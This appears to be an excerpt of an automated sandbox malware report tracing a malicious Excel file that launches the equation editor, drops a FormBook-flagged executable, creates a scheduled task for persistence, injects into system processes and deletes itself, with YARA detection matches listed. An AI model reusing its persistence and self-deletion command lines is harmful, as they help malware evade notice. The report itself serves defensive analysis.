                                                                                                                                                              Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;


                                                                                                                                                              Code Manipulations

                                                                                                                                                              Statistics

                                                                                                                                                              Behavior

                                                                                                                                                              Click to jump to process

                                                                                                                                                              System Behavior

                                                                                                                                                              General

                                                                                                                                                              Start time:19:55:53
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                              Imagebase:0x13fe60000
                                                                                                                                                              File size:27641504 bytes
                                                                                                                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:19:56:13
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:543304 bytes
                                                                                                                                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:19:56:14
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                              Imagebase:0x10000
                                                                                                                                                              File size:1012736 bytes
                                                                                                                                                              MD5 hash:351B0B74944773C3C36D417EEF151670
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2180582325.0000000002474000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2181703532.0000000003D49000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2181703532.0000000003D49000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2181703532.0000000003D49000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              Reputation:low

                                                                                                                                                              General

                                                                                                                                                              Start time:19:56:19
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\VqdYEvk' /XML 'C:\Users\user\AppData\Local\Temp\tmp4BF0.tmp'
                                                                                                                                                              Imagebase:0xfa0000
                                                                                                                                                              File size:179712 bytes
                                                                                                                                                              MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:19:56:20
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:{path}
                                                                                                                                                              Imagebase:0x10000
                                                                                                                                                              File size:1012736 bytes
                                                                                                                                                              MD5 hash:351B0B74944773C3C36D417EEF151670
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low

                                                                                                                                                              General

                                                                                                                                                              Start time:19:56:20
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:{path}
                                                                                                                                                              Imagebase:0x10000
                                                                                                                                                              File size:1012736 bytes
                                                                                                                                                              MD5 hash:351B0B74944773C3C36D417EEF151670
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low

                                                                                                                                                              General

                                                                                                                                                              Start time:19:56:21
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:{path}
                                                                                                                                                              Imagebase:0x10000
                                                                                                                                                              File size:1012736 bytes
                                                                                                                                                              MD5 hash:351B0B74944773C3C36D417EEF151670
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low

                                                                                                                                                              General

                                                                                                                                                              Start time:19:56:22
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:{path}
                                                                                                                                                              Imagebase:0x10000
                                                                                                                                                              File size:1012736 bytes
                                                                                                                                                              MD5 hash:351B0B74944773C3C36D417EEF151670
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.2214101958.0000000000350000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.2214101958.0000000000350000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.2214101958.0000000000350000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.2214932828.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.2214932828.00000000003A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.2214932828.00000000003A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.2215758814.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.2215758814.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.2215758814.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              Reputation:low

                                                                                                                                                              General

                                                                                                                                                              Start time:19:56:25
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:
                                                                                                                                                              Imagebase:0xffca0000
                                                                                                                                                              File size:3229696 bytes
                                                                                                                                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              General

                                                                                                                                                              Start time:19:56:35
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmstp.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                                                                                                                              Imagebase:0xb00000
                                                                                                                                                              File size:84992 bytes
                                                                                                                                                              MD5 hash:00263CA2071DC9A6EE577EB356B0D1D9
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2381241064.00000000008D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2381206154.00000000007E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2380915996.00000000000F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2380915996.00000000000F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2380915996.00000000000F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              Reputation:moderate

                                                                                                                                                              General

                                                                                                                                                              Start time:19:56:41
                                                                                                                                                              Start date:27/01/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                              Imagebase:0x4a630000
                                                                                                                                                              File size:302592 bytes
                                                                                                                                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              Disassembly

                                                                                                                                                              Code Analysis

                                                                                                                                                              Reset < >